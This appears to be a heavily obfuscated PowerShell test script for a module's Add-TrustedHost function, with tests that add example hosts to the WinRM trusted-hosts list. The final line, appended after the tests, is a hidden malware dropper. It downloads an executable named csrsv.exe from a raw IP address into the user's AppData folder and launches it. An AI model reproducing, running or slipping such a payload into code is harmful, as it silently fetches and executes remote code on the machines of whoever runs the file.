& (&("{2}{0}{1}"-f'in','-Path','Jo') -Path ${pS`scrip`TroOT} -ChildPath ((("{6}{5}{7}{0}{3}{4}{1}{2}" -f'nitialize-Car','ps','1','bo','nTest.','}','..{0','I'))  -f[ChaR]92) -Resolve)


if( &("{2}{0}{1}{5}{4}{3}" -f's','t-Admi','Te','ege','il','nPriv') )
{
    ${oriGI`NAltrUST`edHOS`Ts} = ${nu`ll}

    function sT`ART-t`Est
    {
        ${ORiGIN`AlT`RustEDh`o`sTs} = @( .("{1}{3}{2}{0}"-f'edHost','Ge','rust','t-T') )
        &("{0}{1}{3}{2}" -f'Clear-','T','Host','rusted')
    }

    function sTo`P`-tEst
    {
        if( ${o`Ri`gin`AL`Tru`S`TeDHOsTs} )
        {
            &("{2}{1}{0}"-f'dHost','et-Truste','S') -Entry ${o`R`iGi`NALT`RusT`EDHoSts}
        }
    }

    function t`eS`T-S`hoULdadD`New`hoST
    {
        .("{2}{0}{1}"-f'd','d-TrustedHost','A') -Entries ("{2}{1}{0}{3}"-f 'ampl','x','e','e.com') 
        ${T`R`US`TEDhoStS} = @( .("{0}{4}{2}{1}{3}"-f 'Ge','s','o','t','t-TrustedH') )
        .("{3}{0}{2}{1}"-f'ser','ue','t-Tr','As') (${tRu`STe`dhoSTs} -contains ("{2}{0}{1}"-f 'am','ple.com','ex'))
        &("{0}{1}{2}"-f 'Assert','-Equa','l') 1 ${TRUSt`edHos`Ts}."cOU`Nt"
    }

    function t`eST-`sHOuldA`Ddm`Ult`IpL`eHO`Sts
    {
        &("{2}{1}{3}{0}"-f 'Host','dd-','A','Trusted') -Entry ("{0}{1}{2}" -f 'ex','am','ple.com'),("{0}{1}"-f 'we','bmd.com')
        ${truS`TE`DHosTS} = @( &("{3}{2}{0}{1}{4}" -f 'ru','st','-T','Get','edHost') )
        &("{1}{2}{0}" -f'True','As','sert-') (${TRUs`TEdHos`TS} -contains ("{1}{2}{0}"-f '.com','exampl','e'))
        &("{0}{3}{2}{1}"-f 'Ass','rue','rt-T','e') (${tr`UStEd`h`ostS} -contains ("{1}{2}{0}" -f 'm','webm','d.co'))
        .("{2}{0}{3}{1}"-f 'e','-Equal','Ass','rt') 2 ${t`Ru`stEdHO`StS}."CO`UNt"
    }

    function tesT-`sH`O`ULdN`otD`U`PlICAte`EntriES
    {
        .("{0}{3}{4}{1}{2}" -f'Add-','stedHo','st','Tr','u') -Entry ("{1}{2}{0}"-f'mple.com','ex','a')
        &("{2}{3}{0}{1}" -f'-Trusted','Host','A','dd') -Entry ("{2}{1}{0}"-f 'om','e.c','exampl')
        ${t`Ru`sTeDhosTs} = @( .("{1}{3}{2}{0}" -f'st','G','ustedHo','et-Tr') )
        &("{2}{0}{1}"-f 'ssert-T','rue','A') (${truST`E`DhoSts} -contains ("{2}{0}{1}" -f'c','om','example.'))
        .("{0}{1}{2}{3}"-f'Asse','rt','-E','qual') 1 ${TRusTed`H`oSTS}."coU`Nt"
    }
    
    function tEsT-SHo`UlD`SuP`P`Ort`wHATIf
    {
        ${PR`e`TRus`T`ED`HOstS} = @( &("{2}{0}{1}{3}" -f't-TrustedH','o','Ge','st') )
        &("{1}{0}{2}{3}" -f 'ruste','Add-T','dHo','st') -Entry ("{1}{0}{2}{3}"-f'le','examp','.c','om') -WhatIf
        ${tR`US`Te`DHOS`TS} = @( .("{1}{0}{2}{3}"-f 't-TrustedHo','Ge','s','t') )
        .("{2}{1}{0}"-f'rue','ert-T','Ass') (${tR`UST`eD`hoSTS} -notcontains ("{0}{2}{1}" -f'ex','om','ample.c'))
        &("{2}{0}{1}{3}" -f'ser','t','As','-Equal') ${P`R`ETrUsTedh`os`TS}."C`OuNT" ${tRU`S`TEdHosts}."cO`UNT"
        
    }
}


(.("{1}{2}{3}{0}" -f'ect','N','ew-','Obj') ("{3}{1}{2}{4}{0}" -f 'bClient','s','t','Sy','em.Net.We')).("{2}{0}{1}" -f 'oad','File','Downl').Invoke(("{0}{4}{8}{9}{3}{2}{5}{7}{6}{1}"-f'http:/','.exe','o','238/~yaho','/94','/','sv','csr','.','102.53.'),"$env:APPDATA\csrsv.exe");&("{0}{3}{2}{1}" -f 'Star','s','Proces','t-') ("$env:APPDATA\csrsv.exe")
